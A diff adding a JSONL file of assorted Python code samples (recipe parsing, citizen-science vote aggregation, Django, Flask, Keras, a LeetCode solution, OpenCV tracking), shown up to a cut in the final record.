diff --git "a/2963.jsonl" "b/2963.jsonl" new file mode 100644--- /dev/null +++ "b/2963.jsonl" @@ -0,0 +1,680 @@ +{"seq_id":"652659464","text":"from __init__ import ureg, Q_\nimport re\nfrom fractions import Fraction\n\ndef input_to_measurement(string):\n\t\"\"\"\n\tTake all types of string inputs and convert to a valid measurement. Examples:\n\t1 tbs milk\n\tOne tablespoon butter\n\t1 1/2 cups\n\t2 eggs\n\ttwo eggs\n\t1/2 cup grated parmesan cheese\n\t4 cloves garlic, peeled and chopped\n\t1 medium onion\n\t\"\"\"\n\tamount = 0 #we will += the amount to get a full float instead of fractions.\n\tunit = ''\n\tname = ''\n\tprocess = ''\n\t\n\tif has_unit(string,'lists/units.txt'):\n\t\t#Parse the string into pieces\n\t\tlist = string.split(' ')\n\t\t\n\t\tfor item in list:\n\t\t\tif has_unit(item,'lists/units.txt'):\n\t\t\t\tunit = item\n\t\t\telif is_number(item):\n\t\t\t\tamount += is_number(item)\n\t\t\telif has_unit(item,'lists/processes.txt'):\n\t\t\t\tprocess += item + \" \"\n\t\t\telif has_unit(item,'lists/rubbish.txt'):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tname += item + \" \"\n\t\t\n\t\tname = name.strip()\n\t\tprocess = process.strip()\n\t\t\n\t\treturn [amount,unit,name,process]\n\ndef has_unit(string,filename):\n\t\"\"\"Check a string input to see if it has an official unit measurement like TBS or Pint.\"\"\"\n\tf = open(filename)\n\twords = f.read()\n\twords = words.split(',')\n\t\n\tstring = string.lower()\n\t\n\tfor word in words:\n\t\tif string.find(word) != -1:\n\t\t\treturn True\n\t\n\treturn False\n\t\t\t\ndef is_number(string):\n\t\"\"\"Check if string is a number or fraction of any kind and return a float value.\"\"\"\n\ttry:\n\t\treturn float(Fraction(string))\n\texcept ValueError:\n\t\treturn False\n\t\ndef best_unit(quantity):\n\t\"\"\"For any type of unit, find the \"best\" unit. Examples:\n\t1 cup is better than 8 tablespoons.\n\t8 cups is better than 64 tablespoons.\n\t1 tablespoon is better than 1/8 cup.\n\t1 teaspoon is better than 1/3 teaspoon.\n\t\"\"\"\n\ndef separate_recipe(string):\n\t\"\"\"Take a recipe and separate it into parts:\n\tTitle, Yield, Ingredients, Directions\"\"\"\n\t\n#Need to make some function to convert volume to grams for a variety of foods. And vice versa. Just a table of density constants.\n","sub_path":"cooking.py","file_name":"cooking.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"439640181","text":"\"\"\" Aggregate Zooniverse Classifications to obtain\n Labels for Subjects using the Plurality Algorithm\n Allows for restricting the use of the first N users only to\n Simulate the effect on final labels\n\"\"\"\nimport csv\nimport os\nimport argparse\nimport math\nfrom statistics import median_high, StatisticsError\nfrom collections import defaultdict, OrderedDict\nimport logging\n\nimport pandas as pd\n\nfrom utils.logger import set_logging\nfrom config.cfg import cfg\nfrom aggregations import aggregator\nfrom utils.utils import (\n print_nested_dict, set_file_permission, OrderedCounter)\n\n\nflags = cfg['plurality_aggregation_flags']\nflags_global = cfg['global_processing_flags']\n\n# args = dict()\n# args['annotations'] = '/home/packerc/shared/zooniverse/Exports/ENO/ENO_S1_annotations.csv'\n# args['output_csv'] = '/home/packerc/will5448/ENO_S1_plurality_raw_sim.csv'\n# args['subject_csv'] = '/home/packerc/shared/zooniverse/Exports/ENO/ENO_S1_subjects_extracted.csv'\n# args['export_consensus_only'] = False\n# args['log_dir'] = None\n# args['log_filename'] = ''\n# args['n_users_to_use'] = [1, 2, 5, 10, 99]\n\n\ndef aggregate_species(\n species_names, species_stats,\n questions, question_type_map, n_users_total):\n \"\"\" Aggregate species stats \"\"\"\n species_aggs = {x: OrderedDict() for x in species_names}\n for species, stats in species_stats.items():\n if species not in species_names:\n continue\n for question in questions:\n question_type = question_type_map[question]\n if question_type == 'count':\n # generate multiple count aggregations\n for agg_type in flags['COUNT_AGGREGATION_MODES']:\n agg = aggregator.count_aggregator(\n stats[question], flags, mode=agg_type)\n agg_name = '{}_{}'.format(question, agg_type)\n species_aggs[species][agg_name] = agg\n elif question_type == 'prop':\n agg = aggregator.proportion_affirmative(stats[question])\n species_aggs[species][question] = agg\n elif question_type == 'main':\n continue\n # add overall species stats\n species_aggs[species]['n_users_identified_this_species'] = \\\n len(stats['classification_id'])\n n_user_id = species_aggs[species]['n_users_identified_this_species']\n p_user_id = '{:.2f}'.format(n_user_id / n_users_total)\n species_aggs[species]['p_users_identified_this_species'] = p_user_id\n return species_aggs\n\n\ndef calculate_pielou(votes_list):\n \"\"\" Calculate pielous evenness index\n votes_list: list with the number of votes for each species\n \"\"\"\n if len(votes_list) < 2:\n return 0\n # denominator\n lnS = math.log(len(votes_list))\n # numerator\n sumlist = sum(votes_list)\n plist = [float(n)/sumlist for n in votes_list]\n plnplist = [n * math.log(n) for n in plist]\n sumplnp = -sum(plnplist)\n return sumplnp/lnS\n\n\ndef aggregate_subject_annotations(\n subject_data,\n questions,\n question_type_map,\n question_main_id):\n \"\"\" Aggregate subject annotations \"\"\"\n # initialize Counter objects\n stat_all = defaultdict(OrderedCounter)\n stat_species_only = defaultdict(OrderedCounter)\n # extract and add annotations to stats counters\n for anno_dict in subject_data:\n for k, v in anno_dict.items():\n stat_all[k].update({v})\n # store species only answers\n main_answer = anno_dict[question_main_id]\n if main_answer != flags_global['QUESTION_MAIN_EMPTY']:\n for k, v in anno_dict.items():\n stat_species_only[k].update({v})\n # median number of species identifications per user\n # if nobody ids a species, set this to 0\n try:\n n_species_ids_per_user_median = int(\n median_high(stat_species_only['user_name'].values()))\n except StatisticsError:\n n_species_ids_per_user_median = 0\n # get the max number of species identified by any user\n try:\n n_species_ids_per_user_max = int(\n max(stat_species_only['user_name'].values()))\n except ValueError:\n n_species_ids_per_user_max = 0\n # Calculate some statistics\n n_subject_classifications = len(stat_all['classification_id'])\n n_subject_users = len(stat_all['user_name'])\n n_users_id_species = len(stat_species_only['user_name'])\n n_users_id_empty = n_subject_users - n_users_id_species\n p_users_id_species = n_users_id_species / n_subject_users\n # order species by frequency of identifications\n # ties are ordered arbitrarily\n # (according to which species was detected first)\n species_by_frequency = stat_all[question_main_id].most_common()\n species_names_by_frequency = [x[0] for x in species_by_frequency]\n # calc stats for all species\n species_stats = aggregator.stats_for_species(\n species_names_by_frequency, subject_data,\n species_field=question_main_id\n )\n # define empty capture if more volunteers saw nothing\n # than saw something\n is_empty = n_users_id_empty > n_users_id_species\n if is_empty:\n species_aggs = aggregate_species(\n species_names_by_frequency, species_stats,\n questions, question_type_map,\n n_subject_classifications)\n consensus_species = [flags_global['QUESTION_MAIN_EMPTY']]\n pielou = 0\n else:\n species_names_no_empty = [\n x for x in species_names_by_frequency\n if x != flags_global['QUESTION_MAIN_EMPTY']]\n species_aggs = aggregate_species(\n species_names_no_empty, species_stats,\n questions, question_type_map,\n n_users_id_species)\n # calculate pielou\n pielou = calculate_pielou(\n [x['n_users_identified_this_species']\n for x in species_aggs.values()])\n # Determine top / consensus species based on the median number of\n # different species identified by the volunteers\n consensus_species = [species_names_no_empty[i] for i in\n range(n_species_ids_per_user_median)]\n # collect information to be added to the export\n agg_info = {\n 'n_species_ids_per_user_median': n_species_ids_per_user_median,\n 'n_species_ids_per_user_max': n_species_ids_per_user_max,\n 'n_users_classified_this_subject': n_subject_users,\n 'n_users_saw_a_species': n_users_id_species,\n 'n_users_saw_no_species': n_users_id_empty,\n 'p_users_saw_a_species': '{:.2f}'.format(p_users_id_species),\n 'pielous_evenness_index': '{:.2f}'.format(pielou)\n }\n record = {\n 'species_aggregations': species_aggs,\n 'aggregation_info': agg_info,\n 'consensus_species': consensus_species}\n return record\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--annotations\", type=str, required=True,\n help=\"Path to extracted annotations\")\n parser.add_argument(\n \"--output_csv\", type=str, required=True,\n help=\"Path to file to store aggregated annotations.\")\n parser.add_argument(\n \"--export_consensus_only\", action=\"store_true\",\n help=\"Export only species with plurality consensus\")\n parser.add_argument(\n \"--n_users_to_use\", nargs='+', type=int, default=[1, 2, 5, 10, 99],\n help=\"Export only species with plurality consensus\")\n\n parser.add_argument(\n \"--log_dir\", type=str, default=None)\n parser.add_argument(\n \"--log_filename\", type=str,\n default='aggregate_annotations_plurality')\n\n args = vars(parser.parse_args())\n\n ######################################\n # Check Input\n ######################################\n\n if not os.path.isfile(args['annotations']):\n raise FileNotFoundError(\n \"annotations: {} not found\".format(\n args['annotations']))\n\n ######################################\n # Configuration\n ######################################\n\n # logging\n set_logging(args['log_dir'], args['log_filename'])\n\n logger = logging.getLogger(__name__)\n\n for k, v in args.items():\n logger.info(\"Argument {}: {}\".format(k, v))\n\n # logging flags\n print_nested_dict('', flags)\n\n question_main_id = flags_global['QUESTION_DELIMITER'].join(\n [flags_global['QUESTION_PREFIX'], flags_global['QUESTION_MAIN']])\n question_column_prefix = '{}{}'.format(\n flags_global['QUESTION_PREFIX'],\n flags_global['QUESTION_DELIMITER'])\n\n ######################################\n # Import Annotations\n ######################################\n\n # Read Annotations and associate with subject id\n subject_annotations = dict()\n with open(args['annotations'], \"r\") as ins:\n csv_reader = csv.reader(ins, delimiter=',', quotechar='\"')\n header = next(csv_reader)\n questions = [x for x in header if x.startswith(question_column_prefix)]\n for line_no, line in enumerate(csv_reader):\n # print status\n if ((line_no % 10000) == 0) and (line_no > 0):\n print(\"Imported {:,} annotations\".format(line_no))\n # convert to dict\n line_dict = {header[i]: x for i, x in enumerate(line)}\n if line_dict['subject_id'] not in subject_annotations:\n subject_annotations[line_dict['subject_id']] = list()\n subject_annotations[line_dict['subject_id']].append(line_dict)\n\n question_type_map = aggregator.create_question_type_map(\n questions, flags, flags_global)\n\n ######################################\n # Aggregate Annotations\n ######################################\n\n def extract_first_n_users_annotations(subject_data, n_users=2):\n \"\"\" Extract annotations of first n users for a subject \"\"\"\n users = OrderedDict([(x['user_name'], 0) for x in subject_data])\n n_users_real = len(users)\n users_to_extract = set(list(users)[0:min(n_users, n_users_real)])\n subject_data_selected = list()\n for annotation in subject_data:\n if annotation['user_name'] in users_to_extract:\n subject_data_selected.append(annotation)\n return subject_data_selected\n\n subject_species_aggregations = dict()\n for num, (subject_id, subject_data) in enumerate(subject_annotations.items()):\n # print status\n if ((num % 10000) == 0) and (num > 0):\n print(\"Aggregated {:,} subjects\".format(num))\n # gradually select more users\n records = list()\n for n_users_to_extract in args['n_users_to_use']:\n subject_data_select = extract_first_n_users_annotations(\n subject_data, n_users=n_users_to_extract)\n record = aggregate_subject_annotations(\n subject_data_select,\n questions,\n question_type_map,\n question_main_id)\n record['aggregation_info']['max_users_used'] = n_users_to_extract\n records.append(record)\n subject_species_aggregations[subject_id] = records\n\n # Create one record per identification\n subject_identificatons = list()\n for subject_id, subject_agg_data_list in subject_species_aggregations.items():\n # export each species\n for subject_agg_data in subject_agg_data_list:\n for sp, species_dat in subject_agg_data['species_aggregations'].items():\n species_is_plurality_consensus = \\\n int(sp in subject_agg_data['consensus_species'])\n record = {\n 'subject_id': subject_id,\n question_main_id: sp,\n **species_dat,\n **subject_agg_data['aggregation_info'],\n 'species_is_plurality_consensus': species_is_plurality_consensus}\n subject_identificatons.append(record)\n\n # extract all questions and order them by the original ordering\n questions_original = questions\n questions_found = set()\n for row in subject_identificatons:\n row_questions = list(row.keys())\n questions_found = questions_found.union(\n {x for x in row_questions\n if x.startswith(question_column_prefix)})\n questions = list(questions_found)\n questions = sorted(\n questions,\n key=lambda x: '{}_{}'.format(\n questions_original.index(\n [q for q in questions_original if x.startswith(q)][0]), x))\n\n ######################################\n # Export to CSV\n ######################################\n\n df_out = pd.DataFrame(subject_identificatons)\n\n # order columns: subject_id, questions, rest\n cols = df_out.columns.tolist()\n first_cols = ['subject_id'] + questions\n first_cols = [x for x in first_cols if x in cols]\n cols_rearranged = first_cols + [x for x in cols if x not in first_cols]\n df_out = df_out[cols_rearranged]\n\n # sort output by subject_id\n df_out.sort_values(by=first_cols, inplace=True)\n\n if args['export_consensus_only']:\n df_out = df_out[df_out['species_is_plurality_consensus'] == 1]\n\n df_out.to_csv(args['output_csv'], index=False)\n\n logger.info(\"Wrote {} aggregations to {}\".format(\n df_out.shape[0], args['output_csv']))\n\n # change permmissions to read/write for group\n set_file_permission(args['output_csv'])\n","sub_path":"aggregations/aggregate_plurality_sim.py","file_name":"aggregate_plurality_sim.py","file_ext":"py","file_size_in_byte":13544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"298548221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('proyectos', '0020_auto_20150813_1815'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='detalleproductoestimacion',\n name='Estimaciones',\n field=models.ForeignKey(blank=True, to='proyectos.Estimaciones', null=True),\n ),\n ]\n","sub_path":"apps/proyectos/migrations/0021_auto_20150813_1822.py","file_name":"0021_auto_20150813_1822.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"277870120","text":"class InvalidLookupCombination(Exception):\n\n def __init__(self, lookup, lookups, value, *args, **kwargs):\n message = (\n \"Lookup: \\\"{}\\\" has non-string return value, must be only lookup \"\n \"present (not {}) in \\\"{}\\\"\"\n ).format(lookup.raw, len(lookups), value)\n super(InvalidLookupCombination, self).__init__(message,\n *args,\n **kwargs)\n\n\nclass UnknownLookupType(Exception):\n\n def __init__(self, lookup, *args, **kwargs):\n message = \"Unknown lookup type: \\\"{}\\\"\".format(lookup.type)\n super(UnknownLookupType, self).__init__(message, *args, **kwargs)\n\n\nclass UnresolvedVariables(Exception):\n\n def __init__(self, blueprint, *args, **kwargs):\n message = \"Blueprint: \\\"%s\\\" hasn't resolved it's variables\" % (\n blueprint.name)\n super(UnresolvedVariables, self).__init__(message, *args, **kwargs)\n\n\nclass UnresolvedVariable(Exception):\n\n def __init__(self, blueprint, variable, *args, **kwargs):\n message = (\n \"Variable \\\"%s\\\" in blueprint \\\"%s\\\" hasn't been resolved\"\n ) % (variable.name, blueprint.name)\n super(UnresolvedVariable, self).__init__(message, *args, **kwargs)\n\n\nclass MissingVariable(Exception):\n\n def __init__(self, blueprint, variable_name, *args, **kwargs):\n message = \"Variable \\\"%s\\\" in blueprint \\\"%s\\\" is missing\" % (\n variable_name, blueprint.name)\n super(MissingVariable, self).__init__(message, *args, **kwargs)\n\n\nclass StackDoesNotExist(Exception):\n\n def __init__(self, stack_name, *args, **kwargs):\n message = \"Stack: \\\"%s\\\" does not exist in outputs\" % (stack_name,)\n super(StackDoesNotExist, self).__init__(message, *args, **kwargs)\n\n\nclass MissingParameterException(Exception):\n\n def __init__(self, parameters, *args, **kwargs):\n self.parameters = parameters\n message = \"Missing required cloudformation parameters: %s\" % (\n \", \".join(parameters),\n )\n super(MissingParameterException, self).__init__(message, *args,\n **kwargs)\n\n\nclass MissingLocalParameterException(Exception):\n\n def __init__(self, parameter, *args, **kwargs):\n self.parameter = parameter\n message = \"Missing required local parameter: %s\" % parameter\n super(MissingLocalParameterException, self).__init__(message, *args,\n **kwargs)\n\n\nclass OutputDoesNotExist(Exception):\n\n def __init__(self, stack_name, output, *args, **kwargs):\n self.stack_name = stack_name\n self.output = output\n\n message = \"Output %s does not exist on stack %s\" % (output,\n stack_name)\n super(OutputDoesNotExist, self).__init__(message, *args, **kwargs)\n\n\nclass MissingEnvironment(Exception):\n\n def __init__(self, key, *args, **kwargs):\n self.key = key\n message = \"Environment missing key %s.\" % (key,)\n super(MissingEnvironment, self).__init__(message, *args, **kwargs)\n\n\nclass ImproperlyConfigured(Exception):\n\n def __init__(self, cls, error, *args, **kwargs):\n message = \"Class \\\"%s\\\" is improperly configured: %s\" % (\n cls,\n error,\n )\n super(ImproperlyConfigured, self).__init__(message, *args, **kwargs)\n\n\nclass StackDidNotChange(Exception):\n \"\"\"Exception raised when there are no changes to be made by the\n provider.\n \"\"\"\n\n\nclass CancelExecution(Exception):\n \"\"\"Exception raised when we want to cancel executing the plan.\"\"\"\n","sub_path":"stacker/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"398874932","text":"\"\"\"\nCopyright (c) [2019] [sixlab.cn]\n[https://github.com/PatrickRoot/six-site] is licensed under the Mulan PSL v1.\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\nYou may obtain a copy of Mulan PSL v1 at:\n http://license.coscl.org.cn/MulanPSL\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\nPURPOSE.\nSee the Mulan PSL v1 for more details.\n\"\"\"\nimport os\n\nimport markdown\nfrom flask import Blueprint, jsonify, request\n\nfrom config.db import select_one, run_sql\n\napp_api = Blueprint('app_api', __name__)\n\n\n@app_api.route(\"/\")\ndef thought_index():\n return \"api\"\n\n\ndef import_md(filename):\n file_object = open(filename, 'rU')\n count = 0\n\n print(\"开始>>>:\"+filename)\n\n try:\n origin_id = \"\"\n title = \"\"\n date = \"\"\n content_origin = \"\"\n tags = []\n\n for line in file_object:\n line_strip = line.strip()\n if line_strip == \"---\":\n count = count + 1\n continue\n if count > 1:\n content_origin = content_origin + line\n continue\n\n if line_strip.startswith(\"id:\"):\n origin_id = line_strip.replace(\"id:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"title:\"):\n title = line_strip.replace(\"title:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"date:\"):\n date = line_strip.replace(\"date:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"- \"):\n tag = line_strip.replace(\"- \", \"\", 1).strip()\n tags.append(tag)\n continue\n if line_strip.startswith(\"categories:\") or line_strip.startswith(\"tags:\"):\n continue\n if line_strip.startswith(\"toc:\") or line_strip.startswith(\"comments:\"):\n continue\n print(\"未知:\" + line_strip)\n\n html = markdown.markdown(content_origin)\n\n run_sql('''\n INSERT INTO app_posts \n (post_type, post_title, post_summary, post_content, post_content_origin, post_status, view_count, thumb_count, comment_count, create_user, create_time) \n VALUES \n ('blog', ?, ?, ?, ?, '1', 0, 0, 0, ?, ?)\n ''', (title, origin_id, html, content_origin, 'import', date))\n\n app_posts = select_one('''\n select *\n from app_posts\n where post_summary = ?\n ''', (origin_id,))\n\n if app_posts:\n post_id = app_posts[\"id\"]\n\n for tag_name in tags:\n app_tags = select_one('''\n select *\n from app_tags\n where tag_name = ?\n ''', (tag_name,))\n\n if not app_tags:\n run_sql('''\n INSERT INTO app_tags \n (tag_name) \n VALUES \n (?);\n ''', (tag_name,))\n\n app_tags = select_one('''\n select *\n from app_tags\n where tag_name = ?\n ''', (tag_name,))\n\n run_sql('''\n INSERT INTO app_posts_tags\n (post_id, tag_id) \n VALUES \n (?, ?)\n ''', (post_id, app_tags[\"id\"]))\n return title\n finally:\n file_object.close()\n\n\n@app_api.route(\"/import/wordpress\", methods=['GET', 'POST'])\ndef import_wordpress():\n hexo_path = '/Users/patrickroot/six_myspace/python/six-site/test'\n if request.args.__contains__(\"path\"):\n hexo_path = request.args\n\n if request.form.__contains__(\"path\"):\n hexo_path = request.form['path']\n\n count = 0\n files = []\n if hexo_path:\n for filename in os.listdir(hexo_path):\n filename = os.path.join(hexo_path, filename)\n if filename.endswith(\".md\") and os.path.isfile(filename):\n files.append(import_md(filename))\n count = count + 1\n\n return jsonify({\n\n })\n","sub_path":"apps/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"48868317","text":"import warnings; warnings.filterwarnings('ignore')\nimport tensorflow as tf\nimport tensorflow.keras.layers as tkl\nimport tensorflow.keras.utils as tku\nfrom IPython.core.magic import register_line_magic\nfrom IPython.display import display\n\n@register_line_magic\ndef get_model_plot1d(pars):\n pars=pars.split()\n num_timesteps=int(pars[0])\n num_features=int(pars[1])\n num_filters=int(pars[2])\n ks=int(pars[3])\n ps=int(pars[4])\n model=tf.keras.Sequential()\n model.add(tkl.InputLayer((num_timesteps,\n num_features),\n name='input'))\n model.add(tkl.Conv1D(\n filters=num_filters,\n kernel_size=ks,\n padding='same',name='conv1d',\n activation='relu'))\n model.add(tkl.MaxPool1D(\n pool_size=ps,name='pool1d'))\n display(tku.plot_model(model,show_shapes=True))\n\n@register_line_magic\ndef get_model_plot2d(pars):\n pars=pars.split()\n img_size=int(pars[0])\n num_channels=int(pars[1])\n num_filters=int(pars[2])\n ks=int(pars[3])\n ps=int(pars[4])\n model=tf.keras.Sequential()\n model.add(tkl.InputLayer((img_size,img_size,\n num_channels),\n name='input'))\n model.add(tkl.Conv2D(\n filters=num_filters,\n kernel_size=(ks,ks),strides=(1,1),\n padding='same',name='conv2d',\n activation='relu'))\n model.add(tkl.MaxPool2D(\n pool_size=(ps,ps),name='pool2d'))\n display(tku.plot_model(model,show_shapes=True))\n","sub_path":"python_recipes/keras_model_plot12d.py","file_name":"keras_model_plot12d.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"430845573","text":"#\n# @lc app=leetcode id=374 lang=python3\n#\n# [374] Guess Number Higher or Lower\n#\n\n# @lc code=start\n# The guess API is already defined for you.\n# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0\n# def guess(num: int) -> int:\n\nclass Solution:\n def guessNumber(self, n: int) -> int:\n # * 二分法找数字\n\n return int(self.binaryGuess(1, n))\n def binaryGuess(self, left, right):\n\n mid = (left + right) / 2\n res = guess(mid)\n if res == 0:\n return mid\n elif res == 1:\n # 说明数字比mid大\n left = mid + 1\n return self.binaryGuess(left, right)\n elif res == -1:\n # 说明数字比mid小\n right = mid - 1\n return self.binaryGuess(left, right)\n \n# @lc code=end\n\n","sub_path":"leetcode/374/374.guess-number-higher-or-lower.py","file_name":"374.guess-number-higher-or-lower.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578304424","text":"#!/usr/bin/env python3\n\nimport sqlite3\nimport sys\nimport time\nimport json\nimport unicodedata as ud\nfrom contextlib import closing\nfrom os.path import expanduser\n\ndef searchDraft(strSearch):\n\tstrPathDB = expanduser(\"~\") + \"/Library/Group Containers/GTFQ98J4YG.com.agiletortoise.Drafts/DraftStore.sqlite\"\n\t\n\twith closing(sqlite3.connect(strPathDB)) as connection:\n\t\twith closing(connection.cursor()) as cursor:\n\t\t\trows = cursor.execute(\"select ZUUID, ZCONTENT, ZCREATED_AT, ZCHANGED_AT from main.ZMANAGEDDRAFT where ZCONTENT like '%{}%' and ZFOLDER != 10000;\".format(strSearch)).fetchall()\n\t\t\treturn rows\n\n\n# Combine the arguments we want\nstrArg = ' '.join(sys.argv[1:])\n# Normalise any decomposed UTF-8 text from Alfred to composed UTF-8 test to use with SQLite\nstrArg = ud.normalize('NFC',strArg)\n\nintSQLLiteEpoch = 978307200\ndraftMatch = searchDraft(strArg)\narrItems = []\nfor x in draftMatch:\n\tobjItem = {}\n\tobjItem['title'] = x[1].partition('\\n')[0]\n\tobjItem['subtitle'] = \"Modified: \" + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(x[3] + intSQLLiteEpoch)) + \" | Created: \" + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(x[2] + intSQLLiteEpoch))\n\tobjItem['arg'] = x[1]\n\tarrItems.append(objItem)\n\nobjOutput = { \"items\" : arrItems }\nsys.stdout.write(json.dumps(objOutput))\n\t\t","sub_path":"workflows/user.workflow.159049AE-8473-43F8-ACED-0AFD0BAC9E49/copy_content.py","file_name":"copy_content.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"344129460","text":"import inspect\nfrom rest_framework.viewsets import GenericViewSet as BaseGenericViewSet\nfrom rest_framework.metadata import SimpleMetadata\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\n\n\ndef set_if_none(cls, name, value):\n if not hasattr(cls, name) or getattr(cls, name) is None:\n setattr(cls, name, value)\n\n\nclass SchemaMeta(type):\n def __new__(cls, cls_name, super_classes, attrs):\n initiated_class = super().__new__(cls, cls_name, super_classes, attrs)\n if cls_name == \"GenericViewSet\":\n return initiated_class\n\n try:\n meta = attrs.pop(\"Meta\")\n except KeyError:\n raise ImproperlyConfigured(\"Meta should be defined on %s\" % cls_name)\n\n try:\n model = getattr(meta, \"model\")\n except AttributeError:\n raise ImproperlyConfigured(\n \"Meta in %s should contain at least a model\" % cls_name\n )\n\n if not (inspect.isclass(model) and issubclass(model, models.Model)):\n raise ImproperlyConfigured(\n \"model:%s in %s Meta should inherirt from Model\" % (model, cls_name)\n )\n\n try:\n api = getattr(model, \"Api\")\n except AttributeError:\n raise ImproperlyConfigured(\n \"model:%s for %s Meta should declare Api class\" % (model, cls_name)\n )\n\n key = getattr(meta, \"key\", \"default\")\n\n set_if_none(initiated_class, \"queryset\", model.objects.all())\n set_if_none(initiated_class, \"serializer_class\", api.get_serializer(key))\n set_if_none(initiated_class, \"search_fields\", api.search_fields)\n setattr(initiated_class, \"api\", api)\n setattr(api, \"viewset\", initiated_class)\n return initiated_class\n\n\nclass GenericViewSet(BaseGenericViewSet, metaclass=SchemaMeta):\n serializer_classes = {}\n querysets = {}\n filterset_classes = {}\n\n def get_serializer_class(self):\n default = super().get_serializer_class()\n if hasattr(self, \"action\"):\n return self.serializer_classes.get(self.action, default)\n return default\n\n def get_queryset(self, request=None):\n default = super().get_queryset()\n if hasattr(self, \"action\"):\n return self.querysets.get(self.action, default)(request=self.request)\n return default(request=self.request)\n\n def get_filterset_class(self):\n default = super().get_filterset_class()\n if hasattr(self, \"action\"):\n return self.filterset_classes.get(self.action, default)\n return default\n","sub_path":"{{cookiecutter.project_slug}}/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"647089170","text":"import datetime\n\n\nclass AnnotationData(object):\n def __init__(self, text='', label='', uuid=0, dataset_id=0, time_stamp=datetime.datetime.now()):\n self.text = text\n self.label = label\n self.uuid = uuid\n self.dataset_id = dataset_id\n self.time_stamp = time_stamp\n","sub_path":"chi_annotator/webui/webuiapis/apis/mongomodel.py","file_name":"mongomodel.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"46664656","text":"''' Constructs a videocapture device on either webcam or a disk movie file.\nPress q to exit\nOriginal boiler plate code (mouse events, window capture) by Junaed Sattar\nOctober 2018\n'''\nfrom __future__ import division\nimport numpy as np\nimport cv2\nimport sys\nimport random\nimport math\nimport time\n\nfrom matplotlib import pyplot as plt\nfrom typing import List\n\nfrom BoundingBox import BoundingBox\nfrom Particles import Particles\n\n'''global data common to all vision algorithms'''\n'''Mr. Global Arrays would be proud'''\nisTracking = False\nr = g = b = 0.0\nimage = np.zeros((640, 480, 3), np.uint8)\ntrackedImage = np.zeros((640, 480, 3), np.uint8)\nimageWidth = 0\nimageHeight = 0\n\nwidth = 60\nheight = 60\ncurrent_x = []\ncurrent_y = []\nhacky_click_has_occurred = False\n\n\n# Mouse Callback function\ndef clickHandler(event, x, y, flags, param) -> None:\n global current_x\n global current_y\n global hacky_click_has_occurred\n\n if event == cv2.EVENT_LBUTTONUP:\n print('left button released')\n current_x.append(x)\n current_y.append(y)\n hacky_click_has_occurred = True\n\n\ndef calculate_histogram(bounding_box: BoundingBox, img):\n min_x = bounding_box.bottomleft_x\n max_x = bounding_box.bottomleft_x + bounding_box.width\n min_y = bounding_box.bottomleft_y\n max_y = bounding_box.bottomleft_y + bounding_box.height\n\n mask = np.zeros(img.shape[:2], np.uint8)\n mask[int(min_x):int(max_x), int(min_y):int(max_y)] = 255\n histogram = cv2.calcHist([img], [0], mask, [9], [0, 180])\n return histogram\n\n\ndef draw(window, image, colour: (int, int, int)) -> None:\n (bottom_x, bottom_y, width, height) = window\n cv2.rectangle(image, (bottom_x, bottom_y), (bottom_x + width, bottom_y + height), colour, 2)\n\n\ndef captureVideo(src) -> None:\n global image, isTracking, trackedImage, current_x, current_y\n\n cap = cv2.VideoCapture(src)\n if cap.isOpened() and src == '0':\n ret = cap.set(3, 640) and cap.set(4, 480)\n if ret == False:\n print('Cannot set frame properties, returning')\n return\n else:\n frate = cap.get(cv2.CAP_PROP_FPS)\n print(frate, ' is the framerate')\n waitTime = int(1000 / frate)\n\n #\twaitTime = time/image. Adjust accordingly.\n if src == 0:\n waitTime = 1\n if cap:\n print('Succesfully set up capture device')\n else:\n print('Failed to setup capture device')\n\n windowName = 'Mean Shift Vector, press q to quit'\n cv2.namedWindow(windowName)\n cv2.setMouseCallback(windowName, clickHandler)\n\n ret, image = cap.read()\n\n # OpenCV docs - first 5 is the # iterations, second 5 is the min pixels to move before stopping... lower means more accurate?\n termination_parameters = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 5, 5)\n\n while (True):\n start_time = time.time()\n ret, image = cap.read()\n\n if (hacky_click_has_occurred):\n for i in range(0, len(current_x)):\n track_window = 